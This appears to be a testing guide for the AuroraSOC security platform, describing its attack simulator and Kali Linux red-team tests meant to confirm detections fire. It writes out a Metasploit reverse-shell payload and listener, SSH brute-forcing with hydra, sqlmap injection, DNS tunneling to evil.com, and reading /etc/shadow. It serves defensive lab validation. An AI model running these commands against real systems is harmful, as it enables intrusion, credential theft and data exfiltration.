Attack Simulation & Testing
This guide covers how to test AuroraSOC's detection and response capabilities using the built-in attack simulator and external tools like Kali Linux.
Built-In Attack Simulator
AuroraSOC ships with a multi-stage campaign simulator at tools/scripts/demo/attack_simulator.py.
Quick Start
# Start the full stack first
just stack-up-min
just migrate && just seed-admin
# Run the attack simulator against the live stack
python tools/scripts/demo/attack_simulator.py \
--speed fast \
--site default \
--report
Campaign Types
The simulator drives realistic multi-stage attack campaigns through the actual ingest surfaces:
| Campaign | MITRE Techniques | What It Does |
|---|---|---|
| Port Scan → C2 | T1046, T1071.001 | Generates port-scan events, then simulates C2 beacon traffic |
| Credential Theft | T1003.001, T1078 | Mimics credential dumping followed by lateral movement |
| Ransomware Precursor | T1486, T1490, T1562.001 | Pre-encryption reconnaissance and shadow copy deletion |
| curl|bash Dropper | T1059.004, T1105, T1204.002 | Simulates download-and-execute attack chain |
| C2 Beacon | T1071.001, T1572 | Periodic beaconing to external C2 infrastructure |
Simulator Options
python tools/scripts/demo/attack_simulator.py \
--speed slow|normal|fast # Pacing between events (default: normal)
--site default|site-b # Target site (for federation testing)
--loop # Continuously generate attacks
--report # Print final report with detection stats
--campaign c2_beacon # Run specific campaign only
Verifying Detection
After running the simulator:
# Check that cases were created
curl -s http://localhost:8000/api/v1/cases \
-H "Authorization: Bearer $TOKEN" | python -m json.tool
# Check the HITL approval queue
curl -s http://localhost:8000/api/v1/approvals?status=pending \
-H "Authorization: Bearer $TOKEN"
# Verify the audit trail
curl -s http://localhost:8000/api/v1/audit/decisions \
-H "Authorization: Bearer $TOKEN"
End-to-End Demo Flow
The just demo-attack-loop command runs the full detection pipeline:
just demo-attack-loop
This command:
- Starts the compose stack (if not running)
- Replays a C2 beacon PCAP through Suricata
- Waits for case creation (polls the API)
- Prints the incident URL + audit verdict
Testing with Suricata PCAP Replay
For testing the network detection pipeline with real packet captures:
# Replay a PCAP file through Suricata
sudo suricata -r infra/suricata/pcaps/cobalt-strike-beacon.pcap \
--set outputs.0.eve-log.filename=/var/log/suricata/eve.json
# Or use tcpreplay against a live interface
sudo tcpreplay --intf1=eth0 --topspeed infra/suricata/pcaps/cobalt-strike-beacon.pcap
Testing with Kali Linux
For realistic red-team testing, use Kali Linux as the attack platform targeting AuroraSOC-protected infrastructure.
Prerequisites
- Kali Linux VM or container (not on the same host as production AuroraSOC)
- Network connectivity to AuroraSOC's monitored network segment
- AuroraSOC with Suricata monitoring the network
Setup Kali Linux
# Option 1: Docker (lightweight, safe)
docker run -it --rm --network host kalilinux/kali-rolling /bin/bash
apt update && apt install -y nmap metasploit-framework hydra gobuster
# Option 2: VM (full Kali desktop)
# Download from https://www.kali.org/get-kali/
Test 1: Network Scanning (Should Trigger T1046)
# From Kali:
nmap -sS -sV -O -p 1-10000 TARGET_IP
# Expected AuroraSOC response:
# - Suricata fires "ET SCAN" rules
# - Vector normalizes to OCSF category_uid=4 (Network Activity)
# - Detection engine matches sigma rule for port scanning
# - Case created with severity "medium"
Test 2: Brute-Force SSH (Should Trigger T1110.001)
# From Kali:
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://TARGET_IP -t 4
# Expected AuroraSOC response:
# - Multiple failed auth events detected
# - UEBA baseline deviation (login frequency anomaly)
# - Case created: "Brute-force attack detected"
# - If successful login follows, escalated to "critical"
Test 3: C2 Simulation with Metasploit (Should Trigger T1071)
# From Kali - generate a reverse shell payload:
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=KALI_IP LPORT=4444 -f elf > payload.elf
# Start listener:
msfconsole -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter_reverse_tcp; set LHOST KALI_IP; set LPORT 4444; exploit"
# Execute payload on a test target (NOT production!):
# Transfer and run payload.elf on the test endpoint
# Expected AuroraSOC response:
# - Suricata fires C2 beacon detection rules
# - EDR agent detects suspicious process execution
# - Network agent correlates outbound beaconing
# - Case created with severity "critical"
# - HITL gate requests analyst approval for containment
Test 4: Web Application Attacks (Should Trigger T1190)
# From Kali - SQL injection attempt:
sqlmap -u "http://TARGET_IP/vulnerable?id=1" --batch
# Directory traversal:
gobuster dir -u http://TARGET_IP -w /usr/share/wordlists/dirb/common.txt
# Expected AuroraSOC response:
# - WAF rules fire
# - Web security agent correlates attack patterns
# - Case created referencing OWASP category
Test 5: DNS Tunneling (Should Trigger T1071.004)
# From Kali - using iodine:
iodine -f 10.0.0.1 tunnel.evil.com
# Or using dnscat2:
dnscat2 --dns "server=evil.com,port=53"
# Expected AuroraSOC response:
# - Suricata DNS tunnel signature fires
# - Sigma rule matches high-frequency DNS queries
# - Correlation engine links to existing C2 case
Test 6: Credential Dumping Simulation (Should Trigger T1003)
# On a test Linux target (simulates Mimikatz-like behavior):
# Read /etc/shadow (requires root on test target):
cat /etc/shadow
# Or use legitimate tools that trigger detection:
strings /proc/*/maps | grep -i password
# Expected AuroraSOC response:
# - EDR agent detects shadow file access
# - Sigma rule "Credential Access - /etc/shadow Read" fires
# - Case created with MITRE T1003.008 tag
Testing CPS/IoT Detection
Simulate Rogue MQTT Device
# Publish fake sensor data (without valid mTLS cert):
mosquitto_pub -h localhost -p 1883 \
-t "aurora/sensors/rogue_device_01/telemetry" \
-m '{"device_id":"rogue","metric":"temperature","value":99.9,"unit":"C"}'
# Expected response:
# - MQTT consumer rejects unauthenticated connection (mTLS required)
# - If mTLS is disabled for testing: anomaly detector flags stuck/extreme value
Simulate Physical Intrusion
# Send a ToF trip-wire alert via MQTT:
mosquitto_pub -h localhost -p 1883 \
-t "aurora/sensors/tof_zone_a/alerts" \
-m '{"device_id":"tof_zone_a","type":"intrusion_detected","severity":"critical","event_details":"ToF beam broken, no preceding badge-in"}'
# Expected response:
# - CPS agent receives physical intrusion alert
# - Correlation with badge-in records (none found = confirmed anomaly)
# - Case created with severity "critical"
# - PagerDuty notification to on-call
Automated Regression Testing
Run the full detection test suite to verify all Sigma rules fire correctly:
# Unit tests against detection fixtures:
just backend-test -k "test_sigma" -v
# Full detection corpus validation:
python -m pytest tests/detection/ -v --tb=short
# E2E attack loop test (requires live stack):
python -m pytest tests/e2e/test_attack_loop_c2.py -v -m e2e
Safety Guidelines
Critical Safety Rules
- NEVER run attack tools against production systems without explicit written authorization
- ALWAYS use an isolated test network for Kali Linux testing
- ALWAYS use the built-in simulator for routine validation (it's safe by design)
- DOCUMENT all red-team activities in your change management system
- NOTIFY the SOC team before any testing to avoid false escalation
Monitoring Test Results
During testing, monitor these endpoints to verify detection is working:
| Metric | Endpoint | Expected |
|---|---|---|
| New cases | GET /api/v1/cases?status=open | New cases created per campaign |
| Alerts | GET /api/v1/alerts?status=new | Alerts generated from detections |
| Approval queue | GET /api/v1/approvals?status=pending | HITL gates triggered for high-risk actions |
| Sigma matches | Grafana → Detection panel | Rule match count increases |
| Agent activity | GET /api/v1/investigations | Investigations dispatched by orchestrator |